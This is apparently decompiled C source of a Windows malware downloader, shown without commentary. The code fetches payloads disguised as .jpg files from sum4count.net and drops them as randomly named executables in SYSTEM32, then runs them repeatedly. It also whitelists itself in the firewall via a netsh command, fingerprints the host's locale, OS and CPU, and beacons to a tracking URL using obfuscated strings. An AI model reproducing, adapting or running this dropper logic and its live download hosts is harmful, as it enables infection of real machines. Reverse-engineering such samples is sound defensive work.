    int32_t v90 = v89; // 0x401c08
    int32_t v91; // 0x401604
    if (*(char *)0x405ca0 != 0) {
        goto lab_0x401ce4;
    } else {
        // 0x401c0e
        v91 = v89;
        if (*(char *)0x405c9b != 0) {
            goto lab_0x401cbe;
        } else {
            int32_t v92 = v89 - 4; // 0x401c21
            int32_t * v93 = (int32_t *)v92; // 0x401c21
            *v93 = v89 + 1148;
            int32_t v94 = GetFileAttributesA((char *)&g1); // 0x401c22
            v91 = v92;
            if (v94 != -1) {
                goto lab_0x401cbe;
            } else {
                int32_t * v95 = (int32_t *)(v89 - 8); // 0x401c31
                *v95 = (int32_t)"C:\\DOCUME~1\\USER\\TEMP\\";
                int32_t v96 = v89 + 108; // 0x401c36
                int32_t * v97 = (int32_t *)(v89 - 12); // 0x401c3a
                *v97 = (int32_t)"%s\\6.dflb";
                int32_t * v98 = (int32_t *)(v89 - 16); // 0x401c3f
                *v98 = v96;
                wsprintfA((char *)&g1, (char *)&g1);
                *v95 = v96;
                DeleteFileA((char *)&g1);
                *v97 = (int32_t)"http://sum4count.net/pic/tool.jpg";
                *v98 = v89 + 104;
                int32_t v99 = function_4012ee(&g1, (char *)&g1); // 0x401c56
                int32_t v100 = v89 + 8; // 0x401c5c
                *(int32_t *)v100 = v99;
                *v97 = -1;
                *v98 = v99;
                WaitForSingleObject(&g1, (int32_t)&g1);
                *(int32_t *)(v89 - 20) = v100;
                *(int32_t *)(v89 - 24) = *(int32_t *)v89;
                bool v101 = GetExitCodeThread(&g1, &g1); // 0x401c73
                int32_t v102 = v89 - 28; // 0x401c79
                *(int32_t *)v102 = *v95;
                *v93 = (int32_t)v101;
                CloseHandle(&g1);
                v90 = v102;
                if (*v95 != 0) {
                    // 0x401c8d
                    v90 = v102;
                    if (*v93 == 0) {
                        // 0x401c93
                        *(int32_t *)(v89 - 32) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q6.exe";
                        DeleteFileA((char *)&g1);
                        *(int32_t *)(v89 - 36) = v89 + 80;
                        function_401000((int32_t)&g1);
                        *(int32_t *)(v89 - 40) = 0;
                        *(int32_t *)(v89 - 44) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q6.exe";
                        int32_t v103 = v89 - 48; // 0x401cae
                        *(int32_t *)v103 = v89 + 76;
                        CopyFileA((char *)&g1, (char *)&g1, (bool)&g1);
                        *(char *)0x405c9b = 1;
                        v90 = v103;
                    }
                }
                goto lab_0x401ce4;
            }
        }
    }
  lab_0x401afa:;
    int32_t v104 = v59;
    *(char *)0x405c99 = 1;
    *(int32_t *)(v104 - 4) = v104 + 28;
    *(int32_t *)(v104 - 8) = v104 + 44;
    *(int32_t *)(v104 - 12) = 0;
    *(int32_t *)(v104 - 16) = 0;
    *(int32_t *)(v104 - 20) = 0;
    *(int32_t *)(v104 - 24) = 0;
    *(int32_t *)(v104 - 28) = 0;
    *(int32_t *)(v104 - 32) = 0;
    *(int32_t *)(v104 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q2.exe";
    int32_t v105 = v104 - 40; // 0x401b16
    *(int32_t *)v105 = 0;
    CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
    *(char *)0x405c9e = 1;
    v58 = v105;
    goto lab_0x401b20;
  lab_0x401ce4:;
    int32_t v106 = v90;
    int32_t v107 = v106; // 0x401cea
    int32_t v108; // 0x401604
    if (*(char *)0x405ca1 != 0) {
        goto lab_0x401dc6;
    } else {
        // 0x401cf0
        v108 = v106;
        if (*(char *)0x405c9c != 0) {
            goto lab_0x401da0;
        } else {
            int32_t v109 = v106 - 4; // 0x401d03
            int32_t * v110 = (int32_t *)v109; // 0x401d03
            *v110 = v106 + 1668;
            int32_t v111 = GetFileAttributesA((char *)&g1); // 0x401d04
            v108 = v109;
            if (v111 != -1) {
                goto lab_0x401da0;
            } else {
                int32_t * v112 = (int32_t *)(v106 - 8); // 0x401d13
                *v112 = (int32_t)"C:\\DOCUME~1\\USER\\TEMP\\";
                int32_t v113 = v106 + 108; // 0x401d18
                int32_t * v114 = (int32_t *)(v106 - 12); // 0x401d1c
                *v114 = (int32_t)"%s\\7.dflb";
                int32_t * v115 = (int32_t *)(v106 - 16); // 0x401d21
                *v115 = v113;
                wsprintfA((char *)&g1, (char *)&g1);
                *v112 = v113;
                DeleteFileA((char *)&g1);
                *v114 = (int32_t)"http://sum4count.net/pic/proxy.jpg";
                *v115 = v106 + 104;
                int32_t v116 = function_4012ee(&g1, (char *)&g1); // 0x401d38
                int32_t v117 = v106 + 8; // 0x401d3e
                *(int32_t *)v117 = v116;
                *v114 = -1;
                *v115 = v116;
                WaitForSingleObject(&g1, (int32_t)&g1);
                *(int32_t *)(v106 - 20) = v117;
                *(int32_t *)(v106 - 24) = *(int32_t *)v106;
                bool v118 = GetExitCodeThread(&g1, &g1); // 0x401d55
                int32_t v119 = v106 - 28; // 0x401d5b
                *(int32_t *)v119 = *v112;
                *v110 = (int32_t)v118;
                CloseHandle(&g1);
                v107 = v119;
                if (*v112 != 0) {
                    // 0x401d6f
                    v107 = v119;
                    if (*v110 == 0) {
                        // 0x401d75
                        *(int32_t *)(v106 - 32) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q7.exe";
                        DeleteFileA((char *)&g1);
                        *(int32_t *)(v106 - 36) = v106 + 80;
                        function_401000((int32_t)&g1);
                        *(int32_t *)(v106 - 40) = 0;
                        *(int32_t *)(v106 - 44) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q7.exe";
                        int32_t v120 = v106 - 48; // 0x401d90
                        *(int32_t *)v120 = v106 + 76;
                        CopyFileA((char *)&g1, (char *)&g1, (bool)&g1);
                        *(char *)0x405c9c = 1;
                        v107 = v120;
                    }
                }
                goto lab_0x401dc6;
            }
        }
    }
  lab_0x401bdc:;
    int32_t v121 = v74;
    *(char *)0x405c9a = 1;
    *(int32_t *)(v121 - 4) = v121 + 28;
    *(int32_t *)(v121 - 8) = v121 + 44;
    *(int32_t *)(v121 - 12) = 0;
    *(int32_t *)(v121 - 16) = 0;
    *(int32_t *)(v121 - 20) = 0;
    *(int32_t *)(v121 - 24) = 0;
    *(int32_t *)(v121 - 28) = 0;
    *(int32_t *)(v121 - 32) = 0;
    *(int32_t *)(v121 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q5.exe";
    int32_t v122 = v121 - 40; // 0x401bf8
    *(int32_t *)v122 = 0;
    CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
    *(char *)0x405c9f = 1;
    v73 = v122;
    goto lab_0x401c02;
  lab_0x401dc6:;
    int32_t v123 = v107;
    int32_t v124 = v123; // 0x401dcc
    if (*(char *)0x405c9d == 0) {
        // 0x401dce
        v124 = v123;
        if (*(char *)0x405c98 != 0) {
            // 0x401dd6
            *(int32_t *)(v123 - 4) = v123 + 28;
            *(int32_t *)(v123 - 8) = v123 + 44;
            *(int32_t *)(v123 - 12) = 0;
            *(int32_t *)(v123 - 16) = 0;
            *(int32_t *)(v123 - 20) = 0;
            *(int32_t *)(v123 - 24) = 0;
            *(int32_t *)(v123 - 28) = 0;
            *(int32_t *)(v123 - 32) = 0;
            *(int32_t *)(v123 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q1.exe";
            int32_t v125 = v123 - 40; // 0x401deb
            *(int32_t *)v125 = 0;
            CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
            v124 = v125;
        }
    }
    int32_t v126 = v124;
    *(char *)0x405c9d = 1;
    int32_t v127 = v126; // 0x401dfb
    if (*(char *)0x405c9e == 0) {
        // 0x401dfd
        v127 = v126;
        if (*(char *)0x405c99 != 0) {
            // 0x401e05
            *(int32_t *)(v126 - 4) = v126 + 28;
            *(int32_t *)(v126 - 8) = v126 + 44;
            *(int32_t *)(v126 - 12) = 0;
            *(int32_t *)(v126 - 16) = 0;
            *(int32_t *)(v126 - 20) = 0;
            *(int32_t *)(v126 - 24) = 0;
            *(int32_t *)(v126 - 28) = 0;
            *(int32_t *)(v126 - 32) = 0;
            *(int32_t *)(v126 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q2.exe";
            int32_t v128 = v126 - 40; // 0x401e1a
            *(int32_t *)v128 = 0;
            CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
            v127 = v128;
        }
    }
    int32_t v129 = v127;
    *(char *)0x405c9e = 1;
    int32_t v130 = v129; // 0x401e2a
    if (*(char *)0x405ca1 == 0) {
        // 0x401e2c
        v130 = v129;
        if (*(char *)0x405c9c != 0) {
            // 0x401e34
            *(int32_t *)(v129 - 4) = v129 + 28;
            *(int32_t *)(v129 - 8) = v129 + 44;
            *(int32_t *)(v129 - 12) = 0;
            *(int32_t *)(v129 - 16) = 0;
            *(int32_t *)(v129 - 20) = 0;
            *(int32_t *)(v129 - 24) = 0;
            *(int32_t *)(v129 - 28) = 0;
            *(int32_t *)(v129 - 32) = 0;
            *(int32_t *)(v129 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q7.exe";
            int32_t v131 = v129 - 40; // 0x401e49
            *(int32_t *)v131 = 0;
            CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
            v130 = v131;
        }
    }
    int32_t v132 = v130;
    *(char *)0x405ca1 = 1;
    int32_t v133 = v132; // 0x401e59
    if (*(char *)0x405c9a == 0) {
        goto lab_0x401f4e;
    } else {
        // 0x401e5f
        if (*(char *)0x405c98 == 0) {
            goto lab_0x401f76;
        } else {
            // 0x401e6b
            if (*(char *)0x405c99 == 0) {
                goto lab_0x401f76;
            } else {
                // 0x401e77
                v133 = v132;
                if (*(char *)0x405c9b != 0) {
                    // 0x401e83
                    v133 = v132;
                    if (*(char *)0x405c9c != 0) {
                        int32_t v134 = v132 - 4; // 0x401e96
                        int32_t * v135 = (int32_t *)v134; // 0x401e96
                        *v135 = v132 + 888;
                        int32_t v136 = GetFileAttributesA((char *)&g1); // 0x401e97
                        int32_t v137 = v134; // 0x401ea0
                        if (v136 == -1) {
                            int32_t * v138 = (int32_t *)(v132 - 8); // 0x401ea2
                            *v138 = (int32_t)"C:\\DOCUME~1\\USER\\TEMP\\";
                            int32_t v139 = v132 + 108; // 0x401ea7
                            int32_t * v140 = (int32_t *)(v132 - 12); // 0x401eab
                            *v140 = (int32_t)"%s\\3.dflb";
                            int32_t * v141 = (int32_t *)(v132 - 16); // 0x401eb0
                            *v141 = v139;
                            wsprintfA((char *)&g1, (char *)&g1);
                            int32_t * v142 = (int32_t *)(v132 - 20); // 0x401eba
                            *v142 = v132 + 2436;
                            v137 = v132 - 24;
                            int32_t * v143 = (int32_t *)v137; // 0x401ec2
                            *v143 = v139;
                            int32_t v144 = function_4012ee(&g1, (char *)&g1); // 0x401ec3
                            int32_t v145 = v132 + 12; // 0x401ecb
                            *(int32_t *)v145 = v144;
                            *v138 = -1;
                            *v140 = v144;
                            WaitForSingleObject(&g1, (int32_t)&g1);
                            *v141 = v145;
                            *v142 = *(int32_t *)(v132 + 4);
                            GetExitCodeThread(&g1, &g1);
                            *v143 = *v135;
                            CloseHandle(&g1);
                            *(int32_t *)(v132 - 28) = 1;
                            *(int32_t *)(v132 - 32) = (int32_t)"counter";
                            *(int32_t *)(v132 - 36) = v132 + 864;
                            function_401110((int32_t)&g1, (int32_t)&g1, (int32_t)&g1);
                        }
                        int32_t v146 = v137;
                        *(int32_t *)(v146 - 4) = v146 + 28;
                        *(int32_t *)(v146 - 8) = v146 + 44;
                        int32_t v147 = v146 - 12; // 0x401f12
                        *(int32_t *)v147 = 0;
                        *(int32_t *)(v146 - 16) = 0;
                        *(int32_t *)(v146 - 20) = 0;
                        *(int32_t *)(v146 - 24) = 0;
                        *(int32_t *)(v146 - 28) = 0;
                        *(int32_t *)(v146 - 32) = 0;
                        *(int32_t *)(v146 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q6.exe";
                        *(int32_t *)(v146 - 40) = 0;
                        CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
                        *(char *)0x405ca0 = 1;
                        *(int32_t *)(v146 - 44) = v147;
                        *(int32_t *)(v146 - 48) = v146 + 4;
                        *(int32_t *)(v146 - 52) = 0;
                        *(int32_t *)(v146 - 56) = 0;
                        *(int32_t *)(v146 - 60) = 0;
                        *(int32_t *)(v146 - 64) = 0;
                        *(int32_t *)(v146 - 68) = 0;
                        *(int32_t *)(v146 - 72) = 0;
                        *(int32_t *)(v146 - 76) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q7.exe";
                        int32_t v148 = v146 - 80; // 0x401f3c
                        *(int32_t *)v148 = 0;
                        CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
                        *(char *)0x405ca1 = 1;
                        v133 = v148;
                        v54 = v148;
                        if (*(char *)0x405c9f == 0) {
                            goto lab_0x401f86;
                        }
                    }
                }
                goto lab_0x401f4e;
            }
        }
    }
  lab_0x401cbe:;
    int32_t v149 = v91;
    *(char *)0x405c9b = 1;
    *(int32_t *)(v149 - 4) = v149 + 28;
    *(int32_t *)(v149 - 8) = v149 + 44;
    *(int32_t *)(v149 - 12) = 0;
    *(int32_t *)(v149 - 16) = 0;
    *(int32_t *)(v149 - 20) = 0;
    *(int32_t *)(v149 - 24) = 0;
    *(int32_t *)(v149 - 28) = 0;
    *(int32_t *)(v149 - 32) = 0;
    *(int32_t *)(v149 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q6.exe";
    int32_t v150 = v149 - 40; // 0x401cda
    *(int32_t *)v150 = 0;
    CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
    *(char *)0x405ca0 = 1;
    v90 = v150;
    goto lab_0x401ce4;
  lab_0x401f4e:;
    int32_t v53 = v133;
    if (*(char *)0x405c98 != 0) {
        // 0x401f56
        if (*(char *)0x405c99 != 0) {
            // 0x401f5e
            if (*(char *)0x405c9a != 0) {
                // 0x401f66
                if (*(char *)0x405c9b != 0) {
                    // 0x401f6e
                    if (*(char *)0x405c9c != 0) {
                        // break -> 0x401fb2
                        goto lab_0x401fb2;
                    }
                }
            }
        }
    }
    goto lab_0x401f76;
  lab_0x401da0:;
    int32_t v152 = v108;
    *(char *)0x405c9c = 1;
    *(int32_t *)(v152 - 4) = v152 + 28;
    *(int32_t *)(v152 - 8) = v152 + 44;
    *(int32_t *)(v152 - 12) = 0;
    *(int32_t *)(v152 - 16) = 0;
    *(int32_t *)(v152 - 20) = 0;
    *(int32_t *)(v152 - 24) = 0;
    *(int32_t *)(v152 - 28) = 0;
    *(int32_t *)(v152 - 32) = 0;
    *(int32_t *)(v152 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q7.exe";
    int32_t v153 = v152 - 40; // 0x401dbc
    *(int32_t *)v153 = 0;
    CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
    *(char *)0x405ca1 = 1;
    v107 = v153;
    goto lab_0x401dc6;
  lab_0x401f76:;
    int32_t v151 = v53 - 4; // 0x401f76
    *(int32_t *)v151 = 0xea60;
    Sleep((int32_t)&g1);
    int32_t v37 = v151; // 0x401f81
    goto lab_0x40195c;
  lab_0x40185d:
    // 0x40185d
    *v15 = (int32_t)"NO";
    *v17 = (int32_t)"http://sum4count.net/qwertyuiyw12ertyuytre/adv.php?adv=&code1=HNIC&code2=1100&code3=";
    *v19 = (int32_t)"%s%s";
    *v21 = v13 + 2440;
    wsprintfA((char *)&g1, (char *)&g1);
    *v15 = v13 + 1148;
    int32_t v24 = GetFileAttributesA((char *)&g1); // 0x401887
    int32_t v25 = v14; // 0x40188c
    if (v24 != -1) {
        // 0x401892
        *v17 = v13 + 1404;
        int32_t v26 = GetFileAttributesA((char *)&g1); // 0x40189a
        v25 = v16;
        if (v26 != -1) {
            // 0x4018a5
            *v19 = v13 + 1660;
            int32_t v27 = GetFileAttributesA((char *)&g1); // 0x4018ad
            v25 = v18;
            if (v27 != -1) {
                // 0x4018b8
                *v21 = v13 + 616;
                int32_t v28 = GetFileAttributesA((char *)&g1); // 0x4018c0
                v25 = v20;
                if (v28 != -1) {
                    // 0x4018cb
                    *v22 = v13 + 12;
                    *(int32_t *)(v13 - 24) = v13 + 28;
                    int32_t v29 = v13 - 28; // 0x4018db
                    *(int32_t *)v29 = 0;
                    *(int32_t *)(v13 - 32) = 0;
                    *(int32_t *)(v13 - 36) = 0;
                    *(int32_t *)(v13 - 40) = 0;
                    *(int32_t *)(v13 - 44) = 0;
                    *(int32_t *)(v13 - 48) = 0;
                    int32_t v30 = v13 - 52; // 0x4018e1
                    *(int32_t *)v30 = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q1.exe";
                    *(int32_t *)(v13 - 56) = 0;
                    CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
                    *(int32_t *)(v13 - 60) = v29;
                    *(int32_t *)(v13 - 64) = v18;
                    int32_t v31 = v13 - 68; // 0x4018f3
                    *(int32_t *)v31 = 0;
                    *(int32_t *)(v13 - 72) = 0;
                    *(int32_t *)(v13 - 76) = 0;
                    *(int32_t *)(v13 - 80) = 0;
                    *(int32_t *)(v13 - 84) = 0;
                    *(int32_t *)(v13 - 88) = 0;
                    int32_t v32 = v13 - 92; // 0x4018f9
                    *(int32_t *)v32 = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q2.exe";
                    *(int32_t *)(v13 - 96) = 0;
                    CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
                    *(int32_t *)(v13 - 100) = v31;
                    *(int32_t *)(v13 - 104) = v30;
                    int32_t v33 = v13 - 108; // 0x40190b
                    *(int32_t *)v33 = 0;
                    *(int32_t *)(v13 - 112) = 0;
                    *(int32_t *)(v13 - 116) = 0;
                    *(int32_t *)(v13 - 120) = 0;
                    *(int32_t *)(v13 - 124) = 0;
                    *(int32_t *)(v13 - 128) = 0;
                    *(int32_t *)(v13 - 132) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q6.exe";
                    *(int32_t *)(v13 - 136) = 0;
                    CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
                    *(int32_t *)(v13 - 140) = v33;
                    *(int32_t *)(v13 - 144) = v32;
                    *(int32_t *)(v13 - 148) = 0;
                    *(int32_t *)(v13 - 152) = 0;
                    *(int32_t *)(v13 - 156) = 0;
                    *(int32_t *)(v13 - 160) = 0;
                    *(int32_t *)(v13 - 164) = 0;
                    *(int32_t *)(v13 - 168) = 0;
                    *(int32_t *)(v13 - 172) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q7.exe";
                    int32_t v34 = v13 - 176; // 0x40192e
                    *(int32_t *)v34 = 0;
                    CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
                    int32_t v35 = v34; // 0x40192f
                    while (true) {
                        int32_t v36 = v35;
                        *(int32_t *)(v36 - 4) = v36 + 28;
                        *(int32_t *)(v36 - 8) = v36 + 44;
                        *(int32_t *)(v36 - 12) = 0;
                        *(int32_t *)(v36 - 16) = 0;
                        *(int32_t *)(v36 - 20) = 0;
                        *(int32_t *)(v36 - 24) = 0;
                        *(int32_t *)(v36 - 28) = 0;
                        *(int32_t *)(v36 - 32) = 0;
                        *(int32_t *)(v36 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q5.exe";
                        *(int32_t *)(v36 - 40) = 0;
                        CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
                        v35 = v36 - 44;
                        *(int32_t *)v35 = 0x1b7740;
                        Sleep((int32_t)&g1);
                    }
                }
            }
        }
    }
    // 0x401956
    v37 = v25;
    while (true) {
      lab_0x40195c:;
        int32_t v38 = v37;
        v39 = v38;
        if (*(char *)0x405c9d != 0) {
            goto lab_0x401a3e;
        } else {
            // 0x401968
            v40 = v38;
            if (*(char *)0x405c98 != 0) {
                goto lab_0x401a18;
            } else {
                int32_t v41 = v38 - 4; // 0x40197b
                int32_t * v42 = (int32_t *)v41; // 0x40197b
                *v42 = v38 + 2952;
                int32_t v43 = GetFileAttributesA((char *)&g1); // 0x40197c
                v40 = v41;
                if (v43 != -1) {
                    goto lab_0x401a18;
                } else {
                    int32_t * v44 = (int32_t *)(v38 - 8); // 0x40198b
                    *v44 = (int32_t)"C:\\DOCUME~1\\USER\\TEMP\\";
                    int32_t v45 = v38 + 108; // 0x401990
                    int32_t * v46 = (int32_t *)(v38 - 12); // 0x401994
                    *v46 = (int32_t)"%s\\1.dflb";
                    int32_t * v47 = (int32_t *)(v38 - 16); // 0x401999
                    *v47 = v45;
                    wsprintfA((char *)&g1, (char *)&g1);
                    *v44 = v45;
                    DeleteFileA((char *)&g1);
                    *v46 = (int32_t)"http://sum4count.net/pic/null.jpg";
                    *v47 = v38 + 104;
                    int32_t v48 = function_4012ee(&g1, (char *)&g1); // 0x4019b0
                    int32_t v49 = v38 + 8; // 0x4019b6
                    *(int32_t *)v49 = v48;
                    *v46 = -1;
                    *v47 = v48;
                    WaitForSingleObject(&g1, (int32_t)&g1);
                    *(int32_t *)(v38 - 20) = v49;
                    *(int32_t *)(v38 - 24) = *(int32_t *)v38;
                    bool v50 = GetExitCodeThread(&g1, &g1); // 0x4019cd
                    int32_t v51 = v38 - 28; // 0x4019d3
                    *(int32_t *)v51 = *v44;
                    *v42 = (int32_t)v50;
                    CloseHandle(&g1);
                    v39 = v51;
                    if (*v44 != 0) {
                        // 0x4019e7
                        v39 = v51;
                        if (*v42 == 0) {
                            // 0x4019ed
                            *(int32_t *)(v38 - 32) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q1.exe";
                            DeleteFileA((char *)&g1);
                            *(int32_t *)(v38 - 36) = v38 + 80;
                            function_401000((int32_t)&g1);
                            *(int32_t *)(v38 - 40) = 0;
                            *(int32_t *)(v38 - 44) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q1.exe";
                            int32_t v52 = v38 - 48; // 0x401a08
                            *(int32_t *)v52 = v38 + 76;
                            CopyFileA((char *)&g1, (char *)&g1, (bool)&g1);
                            *(char *)0x405c98 = 1;
                            v39 = v52;
                        }
                    }
                    goto lab_0x401a3e;
                }
            }
        }
    }
  lab_0x401fb2:
    // 0x401fb2
    *(int32_t *)(v53 - 4) = 1;
    return 1;
}

// Address range: 0x401fc2 - 0x40258c
int32_t function_401fc2(int32_t hModule) {
    // 0x401fc2
    *(int32_t *)0x405790 = hModule;
    int32_t lpFilename; // bp-3436, 0x401fc2
    GetModuleFileNameA((int32_t *)hModule, (char *)&lpFilename, 260);
    int32_t lpOut; // bp-3180, 0x401fc2
    wsprintfA((char *)&lpOut, "netsh firewall set allowedprogram '%s' enable", &lpFilename);
    WinExec((char *)&lpOut, 0);
    Sleep(3000);
    int32_t Locale = GetSystemDefaultLCID(); // 0x402022
    int32_t szLang; // bp-2540, 0x401fc2
    VerLanguageNameA((int32_t)GetSystemDefaultLangID(), (char *)&szLang, 64);
    int32_t lpLCData; // bp-2476, 0x401fc2
    GetLocaleInfoA(Locale, 4, (char *)&lpLCData, 64);
    int32_t lpLCData2; // bp-664, 0x401fc2
    GetLocaleInfoA(Locale, 0x1002, (char *)&lpLCData2, 64);
    int32_t lpLCData3; // bp-2284, 0x401fc2
    GetLocaleInfoA(Locale, 6, (char *)&lpLCData3, 64);
    int32_t lpVersionInformation = 148; // bp-1068, 0x402082
    GetVersionExA((struct _OSVERSIONINFOA *)&lpVersionInformation);
    int32_t lpOut2; // bp-2668, 0x401fc2
    int32_t v1; // 0x401fc2
    int32_t v2; // 0x401fc2
    wsprintfA((char *)&lpOut2, "Windowd versign is %d.%d", v1, v2);
    int32_t lpOut3; // bp-2412, 0x401fc2
    int32_t v3; // 0x401fc2
    uint16_t v4; // 0x401fc2
    wsprintfA((char *)&lpOut3, "Build: %d, Platform ID: %ld", (int32_t)v4, v3);
    int32_t lpSystemInfo; // bp-88, 0x401fc2
    GetSystemInfo((struct _SYSTEM_INFO *)&lpSystemInfo);
    int32_t v5 = (int32_t)"386"; // 0x4020db
    int16_t v6; // 0x401fc2
    if (v6 != 3) {
        // 0x4020e4
        v5 = (int32_t)"486";
        if (v6 != 4) {
            int32_t v7 = v6 == 5 ? (int32_t)"PENTIUM" : (int32_t)"PENTIUM PRO or PENTIUM II/III";
            v5 = v7;
        }
    }
    // 0x402103
    int32_t v8; // bp-4, 0x401fc2
    int32_t v9 = &v8; // 0x401fc3
    int32_t lpOut4; // bp-2220, 0x401fc2
    wsprintfA((char *)&lpOut4, "Type of Procfssor: %s", (char *)v5);
    CreateSemaphoreA(NULL, 0, 1, "outpost.exe");
    int32_t lpOut5; // bp-2924, 0x401fc2
    wsprintfA((char *)&lpOut5, GetLastError() != 183 ? "ntoutpost" : "oupost.exe");
    int32_t lpBuffer; // bp-3692, 0x401fc2
    GetSystemDirectoryA((char *)&lpBuffer, 260);
    int32_t lpOut6; // bp-600, 0x401fc2
    wsprintfA((char *)&lpOut6, "iuuq;00");
    int32_t lpOut7; // bp-344, 0x401fc2
    wsprintfA((char *)&lpOut7, "tvn5dpvou/ofu");
    int32_t lpOut8; // bp-1580, 0x401fc2
    wsprintfA((char *)&lpOut8, "0bew0");
    int32_t lpOut9; // bp-2092, 0x401fc2
    wsprintfA((char *)&lpOut9, "0bevojr/qiq");
    int32_t lpOut10; // bp-1324, 0x401fc2
    wsprintfA((char *)&lpOut10, "0bempbe/qiq");
    int32_t lpOut11; // bp-920, 0x401fc2
    wsprintfA((char *)&lpOut11, "/pic/");
    int32_t lpSystemTime; // bp-20, 0x401fc2
    GetSystemTime((struct _SYSTEMTIME *)&lpSystemTime);
    struct _SYSTEMTIME * v10; // bp-10, 0x401fc2
    int32_t v11 = (int32_t)v10;
    uint32_t v12 = function_4015e5(v11); // 0x4021c0
    char * v13; // bp-12, 0x401fc2
    int32_t v14 = (int32_t)v13;
    uint32_t v15 = function_4015e5(v14); // 0x4021cc
    uint32_t v16 = v12 / 256; // 0x4021d5
    int32_t v17 = (char)v16 != 0 ? 19 : 48;
    uint32_t v18 = v15 / 256; // 0x4021e9
    int32_t v19 = (char)v18 != 0 ? 25 : 48;
    int32_t lpOut12; // bp-1836, 0x401fc2
    wsprintfA((char *)&lpOut12, "?adv=%u&code1=%c%c%c%c", 99, (char)v15 + 23, (char)v12 + 29, (char)(v19 + v18), (char)(v17 + v16));
